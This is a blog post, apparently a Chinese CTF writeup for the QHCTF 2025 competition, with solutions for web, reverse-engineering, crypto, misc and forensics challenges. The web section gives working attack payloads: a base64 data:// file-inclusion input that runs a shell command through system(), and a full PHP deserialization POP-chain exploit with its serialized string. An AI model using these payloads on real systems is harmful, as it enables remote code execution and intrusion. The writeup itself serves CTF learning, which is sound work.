cyi启航杯wp

web

Easy_include

我用data伪协议

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

然后看源代码就有了


QHCTF{008110b0-0ea4-4ff3-b02e-bd9e74f1be44}


Web_IP

flag.php有

Your IP is : xxx....

原本以为X-Forwarded-For就行,后面发现X-Forwarded-For输入什么都会回显原内容

ssti探测发现。。。


QHCTF{7681991d-96c0-4850-a5ad-0b92ddd227fe}


Web_pop

如题

<?php
highlight_file(__FILE__);
class Start{
    public $name;
    //protected $func;
    public $func;
    public function __destruct()
    {
        echo "Welcome to QHCTF 2025, ".$this->name;
    }
 
    public function __isset($var)
    {
        ($this->func)();
    }
}
 
class Sec{
    // private $obj;
    // private $var;
    public $obj;
    public $var;
    public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }
 
    public function __invoke()
    {
        echo file_get_contents('/flag');
    }
}
 
class Easy{
    public $cla;
 
    public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }
}
 
class eeee{
    public $obj;
 
    public function __clone()
    {
        if(isset($this->obj->cmd)){
            echo "success";
        }
    }
}

$a = new Start();
$b = new Sec();
$a->name = $b;
$c = new Easy();
$d = new eeee();
$b->obj = $c;
$b->var = $d;
$c->cla = $d;
$e = new Start();
$d-> obj = $e;
$f = new Sec();
$e->func = $f;
echo serialize($a);
pop=O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";O:4:"eeee":1:{s:3:"obj";O:5:"Start":2:{s:4:"name";N;s:7:"%00*%00func";O:3:"Sec":2:{s:8:"%00Sec%00obj";N;s:8:"%00Sec%00var";N;}}}}s:3:"var";r:4;}s:4:"func";N;}

QHCTF{91d8bcbd-5484-4272-a1d3-694794b4d6f6}



re

Checker

跟进chenk flag,encrypt flag函数,得到加密逻辑,只是异或了个0x23,重新异或一下就行

拿出加密数据

hex = [
    0x72, 0x6B, 0x60, 0x77, 0x65, 0x58, 0x46, 0x46,
    0x15, 0x40, 0x14, 0x41, 0x1A, 0x40, 0x0E, 0x46,
    0x14, 0x45, 0x16, 0x0E, 0x17, 0x45, 0x42, 0x41,
    0x0E, 0x1A, 0x41, 0x47, 0x45, 0x0E, 0x46, 0x42,
    0x13, 0x14, 0x46, 0x13, 0x10, 0x17, 0x45, 0x15,
    0x42, 0x16, 0x5E
]

flag = []
for i in hex:
    flag.append(i^0x23)
print(bytes(flag))
#b'QHCTF{ee6c7b9c-e7f5-4fab-9bdf-ea07e034f6a5}'

rainbow

有个hideflag函数,进去发现够用了

有个output.txt文件

Encrypted Flag: 0B12190E1C213B6268686C6B6A69776F3B633B776E3C3B6D773B38393C773E3F3B6E69623B6D393F6D6227

又是简单的异或,xor_encrypt函数里面是a1^a2,等于我们自己异或90就行

hex = [
    0x0B, 0x12, 0x19, 0x0E, 0x1C, 0x21, 0x3B, 0x62, 0x68, 0x68, 0x6C, 0x6B, 0x6A, 0x69, 0x77, 0x6F, 0x3B, 0x63, 0x3B,
    0x77, 0x6E, 0x3C, 0x3B, 0x6D, 0x77, 0x3B, 0x38, 0x39, 0x3C, 0x77, 0x3E, 0x3F, 0x3B, 0x6E, 0x69, 0x62, 0x3B, 0x6D,
    0x39, 0x3F, 0x6D, 0x62, 0x27
]

flag = []
for i in hex:
    flag.append(i^90)
print(bytes(flag))
#b'QHCTF{a8226103-5a9a-4fa7-abcf-dea438a7ce78}'

小明的note

upx脱个壳先

密文


加密逻辑在decrypt flag函数中,循环异或秘钥,以及其现长度

hex = [
    0x12, 0x7D, 0xE1, 0x2C, 0x01, 0x4A, 0xC4, 0x45, 0x78, 0x5E, 0xC9, 0x46,
    0x78, 0x5D, 0x83, 0x0F, 0x37, 0x12, 0xD0, 0x45, 0x63, 0x42, 0xD5, 0x57,
    0x76, 0x14, 0xDE, 0x06, 0x6E, 0x04, 0x8F, 0x3E, 0x50, 0x21, 0xE1, 0x3B,
    0x53, 0x72, 0xB7, 0x6C, 0x5D, 0x79, 0xF7
]

key = [0x42, 0x37, 0xA1, 0x7C]

flag = []
for i in range(len(hex)):
    tmp = hex[i] ^ key[i % 4]
    tmp ^= (i + 1)
    flag.append(tmp)

print(bytes(flag))
b'QHCTF{b13cc67d-cd7b-4cc3-9df1-1b34cc4c186d}'


crypto

Easy_RSA

from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import base64

# 提供的私钥和加密消息
private_key = b'-----BEGIN RSA PRIVATE KEY-----\nMIICXAIBAAKBgQCk9qroUGqV/4glx5oHbMkAZFrGAQF+kclLnbqHcHAXz5ElOwaI\n9KdHjMU2DhAgOgvS/Hpc5Qv6wcpB+J1z6x/epTWOcpTAjk0GZGbhyKEnuMhgwATu\neks8uO8J6VNNTXc9MIp9agGHVL5AzOewEiihWDBJ1oiUl01Ju4LwhtY5mQIDAQAB\nAoGAGKmgJ5dOOBq5+hv7VTzYWCyovY2M8aVOGPX92x3eRFEN/Cj08yjQkYvkOA6m\nLos/FU4V5SmBPv4WBQLsV1ZBr0RFYBVWCB0m2DRZyj085vRAChFm2OA6DbSVAe6v\nJgOschwpIMUiAYUgm4kVFSqXy/egJYOIbCUBgvFBJmXbITkCQQDNKTK0x076yhzY\nQIuZm4E52CXo8ma4xESW82FBOgk+jKCXts/cKdJHg56wW1+3W5zxShrNYzXMKi9E\niQUotBk3AkEAzdd3axQ2SZjS/nwtWGDvkj87YJXJ/OriOJdQj9LpX5ZG4cuolT4c\nb5IXfFD/UJX6OipY8/vwp1neWdCy58lrrwJACxaM7QRQmnFN+coTQWwMIeoyslJX\nhujkpBvnR7UxRrYm/8wbk9SWztKoQvPNSoWjB89vf2Y7RBuLjnKxWq/RJQJATYQe\nzIxIBV8v1fYdfXLDxWdajPzbnAs4NeeFxyO+DukguFdhnRJO0xVJEt/NxiM0oELi\nTL9L2TnWqiwVs4P+sQJBAL4pbxfDpLORtIug5nK4XovI5xpLNu1xCJeBE3ZImHTH\n7Hgd6v1Y4DenDddRCq1yQWHIlVFeM94RCwKDtLhuj9s=\n-----END RSA PRIVATE KEY-----'
enmessage = "ceabOhrOBcDv3Cor/SPOK2W5veeSEDCcm3ZcAkyhwpe2xUEoIek0LImSWSarM8ABcavdoOjlZW6kw1S8mjf1TjCmhrZ0b+RbWQTfFAE4UEilE3TBhprpLR3rLP2UlLMNvC7Rrscl3tXxgzXjRd5IJRZbmkk2GLqA/Zx6pZ/cnPM="

def decrypt_message(encrypted_message, private_key):
    # 导入私钥
    key = RSA.import_key(private_key)
    # 创建解密器
    cipher = PKCS1_OAEP.new(key)
    # Base64解码加密消息
    encrypted_bytes = base64.b64decode(encrypted_message)
    # 解密消息
    decrypted_message = cipher.decrypt(encrypted_bytes)
    return decrypted_message.decode()

# 解密消息
decrypted = decrypt_message(enmessage, private_key)
print(decrypted)
#QHCTF{a2a33351-720d-4fe1-bafd-3aa2f0863a58}


misc

PvzHE

images目录下

QHCTF{300cef31-68d9-4b72-b49d-a7802da481a5}



forensics

天天蓝屏,佛了,还有两个题死活不对,懵逼ing

仿真可看https://www.cnblogs.com/xhzccy/p/18354852

ftk以writable形式挂载.E01

以管理员形式打开vm --》新建虚拟机 --》自定义 --》--》稍后安装 --》win10(或其他) --》选择安装位置 --》BIOS--》自己分配处理器和内存 --》默认(nat) --》默认(推荐)--》SATA --》使用物理磁盘 --》设备选择刚刚挂载的PhysicalDrive2(最后的数字可能不一样) --》下一步下一步


Win_02

admin是123456进去的,直接试HackY$_123456,对了。。

QHCTF{fb484ad326c0f3a4970d1352bfbafef8}


Win_04

regedit就有了


QHCTF{c980ad20-f4e4-4e72-81a0-f227f6345f01}


Win_07

flag文件,有注释Please look for the password in the environment variables.

密码在注册表中Th3_1s_F1ag.Z1p_P@ssW0rd_Y0u_Now

UUhDVEZ7NjE0M2I0NmEtOGU5OC00MzU2LWE5YjItMjUxYTdlYzE5ZTUxfQ==

然后base64解码

QHCTF{6143b46a-8e98-4356-a9b2-251a7ec19e51}


不知道哪题

桌面的hacker.exe,pyinstxtractor解包出1.pyc

https://tool.lu/pyc/,pyc转py

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64

# XOR 解密函数
def xor_decrypt(data, key):
    return bytes([data[i] ^ key[i % len(key)] for i in range(len(data))])

# 解密函数
def decrypt_message(aes_key, encrypted_message):
    # 1. Base64 解码
    xor_encrypted = base64.b64decode(encrypted_message)

    # 2. XOR 解密
    xor_key = b'qihangcup'
    base64_encoded = xor_decrypt(xor_encrypted, xor_key)

    # 3. Base64 解码
    aes_encrypted = base64.b64decode(base64_encoded)

    # 4. AES 解密
    cipher = AES.new(aes_key, AES.MODE_ECB)
    decrypted_data = unpad(cipher.decrypt(aes_encrypted), AES.block_size)

    # 返回解密后的字符串
    return decrypted_data.decode('utf-8')

# 主程序
if __name__ == '__main__':
    aes_key = b'acf8bafa15f8cb03'  # AES 密钥
    encrypted_message = 'HgIlNCQUF0MZRA0FMhwODBsTNjM4OQ8RMA81SCImFhQeVkQdCUJfMBs0Mx0fGVowIyoTJ0cdHCwKVwxIOQQCRA=='  # 加密后的消息

    # 解密
    decrypted_message = decrypt_message(aes_key, encrypted_message)
    print(decrypted_message)
    #QHCTF{8b0c14a8-5823-46fd-a547-0dcdc404a7ed}
posted @   ^cyi^  阅读(86)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek “源神”启动!「GitHub 热点速览」
· 我与微信审核的“相爱相杀”看个人小程序副业
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 如何使用 Uni-app 实现视频聊天(源码,支持安卓、iOS)
· C# 集成 DeepSeek 模型实现 AI 私有化(本地部署与 API 调用教程)
历史上的今天:
2024-01-25 春秋杯2023冬季赛writeup_cyi
2024-01-25 cyi polarctf2023冬季个人挑战赛WriteUp
点击右上角即可分享
微信分享提示